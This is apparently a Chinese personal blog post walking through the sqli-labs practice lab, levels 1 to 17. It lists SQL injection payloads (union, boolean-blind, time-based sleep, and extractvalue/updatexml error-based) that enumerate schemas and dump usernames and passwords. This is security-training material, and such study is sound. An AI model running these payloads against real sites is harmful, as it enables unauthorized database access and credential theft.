<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no"><meta name="author" content="syifna"><meta name="renderer" content="webkit"><meta name="copyright" content="syifna"><meta name="keywords" content="syifna~的博客"><meta name="description" content=""><meta name="Cache-Control" content="no-cache"><meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"><title>sqli-labs · syifna's Blog</title><link rel="stylesheet" href="/css/style.css?v=2018.7.9"><link rel="stylesheet" href="/css/animation.css?v=2018.7.9"><link rel="icon" href="/img/assets/favicon.ico"><link rel="stylesheet" href="https://cdn.bootcss.com/font-awesome/4.7.0/css/font-awesome.min.css?version=1.5.6"><!-- scripts--><script>(function( w ){
  "use strict";
  // rel=preload support test
  if( !w.loadCSS ){
    w.loadCSS = function(){};
  }
  // define on the loadCSS obj
  var rp = loadCSS.relpreload = {};
  // rel=preload feature support test
  // runs once and returns a function for compat purposes
  rp.support = (function(){
    var ret;
    try {
      ret = w.document.createElement( "link" ).relList.supports( "preload" );
    } catch (e) {
      ret = false;
    }
    return function(){
      return ret;
    };
  })();

  // if preload isn't supported, get an asynchronous load by using a non-matching media attribute
  // then change that media back to its intended value on load
  rp.bindMediaToggle = function( link ){
    // remember existing media attr for ultimate state, or default to 'all'
    var finalMedia = link.media || "all";

    function enableStylesheet(){
      link.media = finalMedia;
    }

    // bind load handlers to enable media
    if( link.addEventListener ){
      link.addEventListener( "load", enableStylesheet );
    } else if( link.attachEvent ){
      link.attachEvent( "onload", enableStylesheet );
    }

    // Set rel and non-applicable media type to start an async request
    // note: timeout allows this to happen async to let rendering continue in IE
    setTimeout(function(){
      link.rel = "stylesheet";
      link.media = "only x";
    });
    // also enable media after 3 seconds,
    // which will catch very old browsers (android 2.x, old firefox) that don't support onload on link
    setTimeout( enableStylesheet, 3000 );
  };

  // loop through link elements in DOM
  rp.poly = function(){
    // double check this to prevent external calls from running
    if( rp.support() ){
      return;
    }
    var links = w.document.getElementsByTagName( "link" );
    for( var i = 0; i < links.length; i++ ){
      var link = links[ i ];
      // qualify links to those with rel=preload and as=style attrs
      if( link.rel === "preload" && link.getAttribute( "as" ) === "style" && !link.getAttribute( "data-loadcss" ) ){
        // prevent rerunning on link
        link.setAttribute( "data-loadcss", true );
        // bind listeners to toggle media back
        rp.bindMediaToggle( link );
      }
    }
  };

  // if unsupported, run the polyfill
  if( !rp.support() ){
    // run once at least
    rp.poly();

    // rerun poly on an interval until onload
    var run = w.setInterval( rp.poly, 500 );
    if( w.addEventListener ){
      w.addEventListener( "load", function(){
        rp.poly();
        w.clearInterval( run );
      } );
    } else if( w.attachEvent ){
      w.attachEvent( "onload", function(){
        rp.poly();
        w.clearInterval( run );
      } );
    }
  }


  // commonjs
  if( typeof exports !== "undefined" ){
    exports.loadCSS = loadCSS;
  }
  else {
    w.loadCSS = loadCSS;
  }
}( typeof global !== "undefined" ? global : this ) );</script><script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js" defer></script><script src="/js/main.js?v=2018.7.9" defer></script><!-- fancybox--><link rel="preload" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'"><script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.js" defer></script><!-- busuanzi--><script async src="//dn-lbstatics.qbox.me/busuanzi/2.3/busuanzi.pure.mini.js"></script><meta name="generator" content="Hexo 7.3.0"></head><body><section class="profile-close" id="cxo-profile"><div class="profile-avatar"><i class="fa fa-caret-left"></i><img src="/img/assets/an.jpg"></div><!--.profile-saying
  i.fa.fa-comment
  .saying--><div class="cxo-profile-inner"><div class="profile-name">忆昔子~</div><div class="profile-signature">for me</div><div class="friends"><div>FRIENDS</div><span><a href="//kugulu.github.io/" target="_black">friendA</a></span><span><a href="//shadbh.github.io/" target="_black">friendB</a></span><span><a href="//jothon.github.io/" target="_black">friendC</a></span><span><a href="//gu0f3n.github.io/" target="_black">friendD</a></span></div><div class="read-progress"></div></div></section><header id="cxo-intro" style="height: 70vh;background-image: url(/img/intro/index-bg.png);"><nav id="cxo-intro-nav"><section><div class="intro-nav-title"><a href="/">syifna's Blog</a></div><div class="intro-nav-label-box"><a href="/">Home</a><a href="/about/">About</a><a href="/archives/">Archives</a><a href="/tags/">Tags</a></div><i class="fa fa-bars intro-nav-menu"><div class="intro-nav-drop"><a href="/">Home</a><a href="/about/">About</a><a href="/archives/">Archives</a><a href="/tags/">Tags</a></div></i><div class="clear"></div></section></nav><h1 class="post-title">sqli-labs</h1><div class="post-intros"><div class="post-intro-meta"><span class="post-intro-time"><i class="post-intro-calendar fa fa-calendar"></i><span>2025-07-07</span></span></div></div></header><article class="cxo-up" id="cxo-content-outer"><section id="cxo-content-inner"><article class="article-entry" id="post"><p><strong>联合注入</strong></p>
<h2 id="Less-1"><a href="#Less-1" class="headerlink" title="Less-1"></a>Less-1</h2><p>1.我们可以使用\(转义字符)来判断SQL注入的闭合方式,判断注入类型。</p>
<p><strong>分析报错信息：看\斜杠后面跟着的字符，是什么字符，它的闭合字符就是什么，若是没有，就为数字型。</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?id=1\</span><br><span class="line">#本题\后面是&#x27;</span><br></pre></td></tr></table></figure>

<p><img src="/2025/07/07/sqli-labs/image-20250707111755696.png" alt="image-20250707111755696.png"></p>
<p>2.我们再试试注释符，有回显</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1&#x27; --+</span><br></pre></td></tr></table></figure>

<p><img src="/2025/07/07/sqli-labs/image-20250707101152524.png" alt="image-20250707101152524"></p>
<p>3.找出列数</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?id=1&#x27; order by 3 --+</span><br><span class="line">#当我们查询到4的时候，出现报错，说明只有3列</span><br></pre></td></tr></table></figure>

<p><img src="/2025/07/07/sqli-labs/image-20250707101656693.png" alt="image-20250707101656693"></p>
<p>4.我们需要继续找出显示位</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?id=-1&#x27;union select 1,2,3--+</span><br><span class="line">#第2，3列是显示位</span><br></pre></td></tr></table></figure>

<p><img src="/2025/07/07/sqli-labs/image-20250707102027079.png" alt="image-20250707102027079"></p>
<p>5.爆出数据名和版本号</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=-1&#x27;union select 1,database(),version()--+</span><br></pre></td></tr></table></figure>

<p><img src="/2025/07/07/sqli-labs/image-20250707102254900.png" alt="image-20250707102254900"></p>
<p>6.爆表名</p>
<p>information_schema.tables表示该数据库下的tables表，点表示下一级。where后面是条件，group_concat()是将查询到结果连接起来。如果不用group_concat查询到的只有一个表名。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=-1&#x27;union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=&#x27;security&#x27;--+</span><br></pre></td></tr></table></figure>

<p>该语句的意思是查询information_schema数据库下的tables表里面且table_schema字段内容是security的所有table_name的内容。</p>
<p><img src="/2025/07/07/sqli-labs/image-20250707103537759.png" alt="image-20250707103537759"></p>
<p>有4个表名</p>
<p>7.爆字段名</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=-1&#x27;union select 1,2,group_concat(column_name) from information_schema.columns where table_name=&#x27;users&#x27;--+</span><br></pre></td></tr></table></figure>

<p><img src="/2025/07/07/sqli-labs/image-20250707103936765.png" alt="image-20250707103936765"></p>
<p>8.查询字段内容</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=-1&#x27; union select 1,2,group_concat(username ,id , password) from users--+</span><br></pre></td></tr></table></figure>

<p><img src="/2025/07/07/sqli-labs/image-20250707104552381.png" alt="image-20250707104552381"></p>
<h2 id="Less-2"><a href="#Less-2" class="headerlink" title="Less-2"></a>Less-2</h2><p>1.和Less-1一样的方法</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?id=1\</span><br><span class="line">#\后没有东西，所以是数字型注入，数字型不考虑注释符</span><br></pre></td></tr></table></figure>

<p><img src="/2025/07/07/sqli-labs/image-20250707112501428.png" alt="image-20250707112501428"></p>
<p>2，后面的步骤和前面一样</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">?id=1 order by 3</span><br><span class="line"></span><br><span class="line">?id=-1 union select 1,2,3</span><br><span class="line"></span><br><span class="line">?id=-1 union select 1,database(),version()</span><br><span class="line"></span><br><span class="line">?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=&#x27;security&#x27;</span><br><span class="line"></span><br><span class="line">?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name=&#x27;users&#x27;</span><br><span class="line"></span><br><span class="line">?id=-1 union select 1,2,group_concat(id,username,password) from users</span><br></pre></td></tr></table></figure>

<p><img src="/2025/07/07/sqli-labs/image-20250707114334015.png" alt="image-20250707114334015"></p>
<h2 id="Less-3"><a href="#Less-3" class="headerlink" title="Less-3"></a>Less-3</h2><p>1.判断闭合符</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?id=1\</span><br><span class="line">#\后面是&#x27;)</span><br></pre></td></tr></table></figure>

<p><img src="/2025/07/07/sqli-labs/image-20250707114444997.png" alt="image-20250707114444997"></p>
<p>2.考虑注释符</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?id=1&#x27;)--+</span><br><span class="line">#回显成功</span><br></pre></td></tr></table></figure>

<p><img src="/2025/07/07/sqli-labs/image-20250707114633663.png" alt="image-20250707114633663"></p>
<p>3.后面还是一样的步骤</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">?id=-1&#x27;) order by 3--+</span><br><span class="line"></span><br><span class="line">?id=-1&#x27;) union select 1,2,3--+</span><br><span class="line"></span><br><span class="line">?id=-1&#x27;) union select 1,database(),version()--+</span><br><span class="line"></span><br><span class="line">?id=-1&#x27;) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=&#x27;security&#x27;--+</span><br><span class="line"></span><br><span class="line">?id=-1&#x27;) union select 1,2,group_concat(column_name) from information_schema.columns where table_name=&#x27;users&#x27;--+</span><br><span class="line"></span><br><span class="line">?id=-1&#x27;) union select 1,2,group_concat(id,username,password) from users--+</span><br></pre></td></tr></table></figure>

<p><img src="/2025/07/07/sqli-labs/image-20250707150720035.png" alt="image-20250707150720035"></p>
<h2 id="Less-4"><a href="#Less-4" class="headerlink" title="Less-4"></a>Less-4</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">?id=1\</span><br><span class="line">#得到闭合符是&quot;)</span><br><span class="line"></span><br><span class="line">?id=1&quot;)--+</span><br><span class="line">#成功回显</span><br><span class="line"></span><br><span class="line">?id=-1&quot;) order by 3--+</span><br><span class="line"></span><br><span class="line">?id=-1&quot;) union select 1,2,3--+</span><br><span class="line"></span><br><span class="line">?id=-1&quot;) union select 1,database(),version()--+</span><br><span class="line"></span><br><span class="line">?id=-1&quot;) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=&#x27;security&#x27;--+</span><br><span class="line"></span><br><span class="line">?id=-1&quot;) union select 1,2,group_concat(column_name) from information_schema.columns where table_name=&#x27;users&#x27;--+</span><br><span class="line"></span><br><span class="line">?id=-1&quot;) union select 1,2,group_concat(id,username,password) from users--+</span><br></pre></td></tr></table></figure>





<p><strong>布尔盲注</strong></p>
<h2 id="Less-5"><a href="#Less-5" class="headerlink" title="Less-5"></a>Less-5</h2><p>在这一题，发现不管我们输入什么，页面都不会发生变化，不会回显，所以不能使用联合注入，这里我们采用布尔盲注</p>
<p>1.length()函数确定长度</p>
<p>2.substr(a,b,c)a是要截取的字符串，b是截取的位置，c是截取的长度。布尔盲注我们都是长度为1因为我们要一个个判断字符。</p>
<p>3.ascii()是将截取的字符转换成对应的ascii吗，这样我们可以很好确定数字根据数字找到对应的字符</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">?id=1\</span><br><span class="line">#闭合符是&#x27;</span><br><span class="line"></span><br><span class="line">?id=1&#x27;and length((select database()))&gt;9--+</span><br><span class="line">#页面在我们输入8的时候开始变化，所以数据库名长度是8</span><br><span class="line"></span><br><span class="line">?id=1&#x27;and ascii(substr((select database()),1,1))=115--+</span><br><span class="line">#我们依次测，得到8个字母拼接的数据名是security</span><br><span class="line"></span><br><span class="line">?id=1&#x27;and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))&gt;30--+</span><br><span class="line">#判断所有表名字符长度。29出现变化，说明有29个字符</span><br><span class="line"></span><br><span class="line">?id=1&#x27;and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))=101--+</span><br><span class="line">#得到所有表名</span><br><span class="line"></span><br><span class="line">?id=1&#x27;and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=&#x27;users&#x27;),1,1))&gt;99--+</span><br><span class="line">#逐一判断字段名</span><br><span class="line"></span><br><span class="line">?id=1&#x27; and length((select group_concat(username,password) from users))&gt;109--+</span><br><span class="line">#判断字段内容长度</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">?id=1&#x27; and ascii(substr((select group_concat(username,password) from users),1,1))&gt;50--+</span><br><span class="line">#逐一检测内容。</span><br><span class="line"></span><br></pre></td></tr></table></figure>





<h2 id="Less-6"><a href="#Less-6" class="headerlink" title="Less-6"></a>Less-6</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?id=1\</span><br><span class="line">#闭合符是&quot;</span><br></pre></td></tr></table></figure>

<p>把less-5所有中所有单引号变成双引号</p>
<h2 id="Less-7"><a href="#Less-7" class="headerlink" title="Less-7"></a>Less-7</h2><p>这题不能用转义字符，用其他方法判断</p>
<p>1.当我们依次输入1,1’,1”时，1’出现报错，说明是单引号字符型注入</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1&#x27;</span><br></pre></td></tr></table></figure>

<p>2.判断闭合方式</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id=1&#x27;))--+</span><br></pre></td></tr></table></figure>

<p>3.把less-5中的’变成’))就好了</p>
<h2 id="Less-8"><a href="#Less-8" class="headerlink" title="Less-8"></a>Less-8</h2><p>1.当我们依次输入1,1’,1”时，1’出现错误页面，说明是单引号字符型注入</p>
<p>2.后面步骤和less-5一样</p>
<p><strong>时间盲注</strong></p>
<h2 id="Less-9"><a href="#Less-9" class="headerlink" title="Less-9"></a>Less-9</h2><p>布尔盲注适合页面对于错误和正确结果有不同反应。如果页面一直不变这个时候我们可以使用时间注入，时间注入和布尔盲注两种没有多大差别,只不过时间盲注多了if函数和sleep()函数。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br></pre></td><td class="code"><pre><span class="line">?id=1&#x27; and if(1=1,sleep(5),1)--+</span><br><span class="line">#判断参数构造。</span><br><span class="line"></span><br><span class="line">?id=1&#x27;and if(length((select database()))&gt;7,sleep(5),1)--+</span><br><span class="line">#判断数据库名长度,当数据为&gt;8时，浏览器反应了5秒，说明是8个字符</span><br><span class="line"></span><br><span class="line">?id=1&#x27;and if(ascii(substr((select database()),1,1))=115,sleep(5),1)--+</span><br><span class="line">#逐一判断数据库字符，反应了5秒，说明数据库名的第一个字符是s</span><br><span class="line"></span><br><span class="line">?id=1&#x27;and if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))&gt;30,sleep(5),1)--+</span><br><span class="line">#判断所有表名长度</span><br><span class="line"></span><br><span class="line">?id=1&#x27;and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))&gt;99,sleep(5),1)--+</span><br><span class="line">#逐一判断表名</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">?id=1&#x27;and if(length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=&#x27;users&#x27;))&gt;20,sleep(5),1)--+</span><br><span class="line">#判断所有字段名的长度</span><br><span class="line"> </span><br><span class="line">?id=1&#x27;and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=&#x27;users&#x27;),1,1))&gt;99,sleep(5),1)--+</span><br><span class="line">#逐一判断字段名。</span><br><span class="line"></span><br><span class="line">?id=1&#x27; and if(length((select group_concat(username,password) from users))&gt;109,sleep(5),1)--+</span><br><span class="line">#判断字段内容长度</span><br><span class="line">  </span><br><span class="line"> ?id=1&#x27; and if(ascii(substr((select group_concat(username,password) from users),1,1))&gt;50,sleep(5),1)--+</span><br><span class="line">#逐一检测内容。</span><br><span class="line"></span><br></pre></td></tr></table></figure>





<h2 id="Less-10"><a href="#Less-10" class="headerlink" title="Less-10"></a>Less-10</h2><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">?id=1&#x27; and if(1=1,sleep(5),1)--+</span><br><span class="line">#立即反应了，说明不是单引号字符型注入</span><br><span class="line">?id=1&quot; and if(1=1,sleep(5),1)--+</span><br><span class="line">#最后得到是双引号字符型注入。</span><br><span class="line">之后的步骤和上题差不多了，把单引号变成双引号。</span><br></pre></td></tr></table></figure>





<h2 id="Less-11"><a href="#Less-11" class="headerlink" title="Less-11"></a>Less-11</h2><p>到11题，页面显示的是登入页面，注入点就在输入框里面。</p>
<p>和前10关不一样，前10关知道id&#x3D;1是正确的，id&#x3D;-1一定是错误的，而Less11-Less20需要输入用户名和密码，且我们默认不知道用户名或者密码，所以我们需要借助or 1&#x3D;1</p>
<p><img src="/2025/07/07/sqli-labs/image-20250708205358368.png" alt="image-20250708205358368"></p>
<p>1.输入1’ 出现报错，根据报错是单引号字符型注入，然后输入一条恒成立的sql语句，注释符–+用不了了，我们用#</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">1&#x27; or 1=1#</span><br><span class="line">闭合符是&#x27;</span><br></pre></td></tr></table></figure>

<p>2.然后用联合注入(和之前一样的步骤)</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">1&#x27; union select 1,2 #</span><br><span class="line">1&#x27; union select database(),version() #</span><br><span class="line">1&#x27; union select 1,group_concat(table_name) from information_schema.tables where table_schema=&#x27;security&#x27; #</span><br><span class="line">1&#x27; union select 1,group_concat(column_name) from information_schema.columns where table_name=&#x27;users&#x27;#</span><br><span class="line">1&#x27; union select 1,group_concat(id,username,password</span><br><span class="line">) from users #</span><br></pre></td></tr></table></figure>





<h2 id="Less-12"><a href="#Less-12" class="headerlink" title="Less-12"></a>Less-12</h2><p>1.输入1”出现报错，根据报错提示，说明是双引号字符型注入。</p>
<p>2.闭合方式</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">?id=1\</span><br><span class="line">#\后面是&quot;),所以得到闭合符是&quot;)</span><br><span class="line"></span><br><span class="line">1&quot;) or 1=1 #</span><br><span class="line">#回显成功,之后步骤和前面差不多</span><br></pre></td></tr></table></figure>





<p><strong>报错注入</strong></p>
<h2 id="Less-13"><a href="#Less-13" class="headerlink" title="Less-13"></a>Less-13</h2><p>1.输入1\，得到闭合符是’)，单引号字符型注入</p>
<p>2.输入恒成立等式</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&#x27;) or 1=1 #</span><br></pre></td></tr></table></figure>

<p><img src="/2025/07/07/sqli-labs/image-20250707215739316.png" alt="image-20250707215739316"></p>
<p>但是页面没有回显，所以我们可以使用报错注入</p>
<p>1.爆库</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&#x27;) union select 1,extractvalue(1,concat(0x7e,(select database()),0x7e))#</span><br></pre></td></tr></table></figure>

<p>2.爆表名</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&#x27;) union select 1,extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema=&#x27;security&#x27;),0x7e))#</span><br></pre></td></tr></table></figure>

<p>3.爆字段名</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&#x27;) union select 1,extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema = &#x27;security&#x27; and table_name=&#x27;users&#x27;),0x7e))#</span><br></pre></td></tr></table></figure>

<p><img src="/2025/07/07/sqli-labs/image-20250708152407506.png" alt="image-20250708152407506"></p>
<p>4.查询字段</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&#x27;) union select 1,extractvalue(1,concat(0x7e,(select group_concat(username,password) from users),0x7e))#</span><br></pre></td></tr></table></figure>





<h2 id="Less-14"><a href="#Less-14" class="headerlink" title="Less-14"></a>Less-14</h2><p>1.输入1\，得到闭合符是”</p>
<p>2.后面步骤和less13差不多</p>
<h2 id="Less-15"><a href="#Less-15" class="headerlink" title="Less-15"></a>Less-15</h2><p>1.用恒成立的式子，找出本题的闭合符</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&#x27; or 1=1#</span><br></pre></td></tr></table></figure>

<p><img src="/2025/07/07/sqli-labs/image-20250708195139292.png" alt="image-20250708195139292"></p>
<p>显示成功，说明是单引号字符型注入</p>
<p>2.查找显示位，输入</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">1&#x27; union select 1,2 #</span><br></pre></td></tr></table></figure>

<p>页面显示成功，但是没有回显，我们使用用布尔盲注</p>
<p>3.输入布尔盲注语句</p>
<p>or:<strong>任一</strong>条件为真即可</p>
<p>已知1是错误密码，所以or后面的语句如果是正确的，则会返回成功的页面</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">1&#x27; or  length((select database())) = 8 #</span><br><span class="line"></span><br><span class="line">1&#x27;or ascii(substr((select database()),1,1))=115#</span><br><span class="line">......</span><br><span class="line"></span><br><span class="line">把前面less5的布尔语句的and变成or就好了</span><br></pre></td></tr></table></figure>





<h2 id="Less-16"><a href="#Less-16" class="headerlink" title="Less-16"></a>Less-16</h2><p>1.和15一样的方法</p>
<p>闭合符是”)</p>
<h2 id="Less-17"><a href="#Less-17" class="headerlink" title="Less-17"></a>Less-17</h2><p>我们来到17题，页面发生了一些变化。</p>
<p>new password框框分情况：如果user name框框中输入的是系统中不存在的用户名，则new password框框中不管包含单引号还是双引号，都是不会报错的；但如果user name框框中输入的是系统中存在的用户名，则new password框框中包含单引号会报错。</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">uname=admin&amp;passwd=1&#x27; &amp;submit=Submit</span><br></pre></td></tr></table></figure>

<p>输入后，页面会报错，根据报错可以知道闭合符是单引号</p>
<p>输入报错注入语句</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">uname=admin&amp;passwd=1&#x27; or updatexml(1,concat(0x7e,(database()),0x7e),1)#&amp;submit=Submit</span><br></pre></td></tr></table></figure>





<p>Less-18</p>
</article><!-- lincense--><div class="license-wrapper"><p> <span>Author:  </span><a href="http://syifna.github.io">syifna</a></p><p> <span>Link:  </span><a href="http://syifna.github.io/2025/07/07/sqli-labs/">http://syifna.github.io/2025/07/07/sqli-labs/</a></p><p> <span>Copyright:  </span><span>All articles in this blog are licensed under <a rel="license noopener" target="_blank" href="https://creativecommons.org/licenses/by-nc-nd/3.0">CC BY-NC-SA 3.0</a> unless stating additionally.</span></p></div><div class="post-paginator"><a class="nextSlogan" href="/2025/05/19/RCE-labs/" title="RCE-labs"><span>NextPost ></span><br><span class="nextTitle">RCE-labs</span></a><div class="clear"></div></div><div id="comment"></div></section></article><footer id="cxo-footer-outer"><div id="cxo-footer-inner"><p class="footer-container"><span>Site by </span><a target="_blank" rel="noopener" href="http://hexo.io"><span>Hexo</span></a><span> | theme </span><a target="_blank" rel="noopener" href="https://github.com/Longlongyu/hexo-theme-Cxo"><span>Cxo</span></a></p><i class="fa fa-user"> </i><span id="busuanzi_value_site_uv"></span><span> | </span><i class="fa fa-eye"> </i><span id="busuanzi_value_site_pv"></span></div></footer><!-- catelog--><div class="toc-wrapper" style="top: 70vh;"><div class="toc-catalog"><i class="fa fa-list"> </i><span>CATALOG</span></div><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#Less-1"><span class="toc-number">1.</span> <span class="toc-text">Less-1</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Less-2"><span class="toc-number">2.</span> <span class="toc-text">Less-2</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Less-3"><span class="toc-number">3.</span> <span class="toc-text">Less-3</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Less-4"><span class="toc-number">4.</span> <span class="toc-text">Less-4</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Less-5"><span class="toc-number">5.</span> <span class="toc-text">Less-5</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Less-6"><span class="toc-number">6.</span> <span class="toc-text">Less-6</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Less-7"><span class="toc-number">7.</span> <span class="toc-text">Less-7</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Less-8"><span class="toc-number">8.</span> <span class="toc-text">Less-8</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Less-9"><span class="toc-number">9.</span> <span class="toc-text">Less-9</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Less-10"><span class="toc-number">10.</span> <span class="toc-text">Less-10</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Less-11"><span class="toc-number">11.</span> <span class="toc-text">Less-11</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" 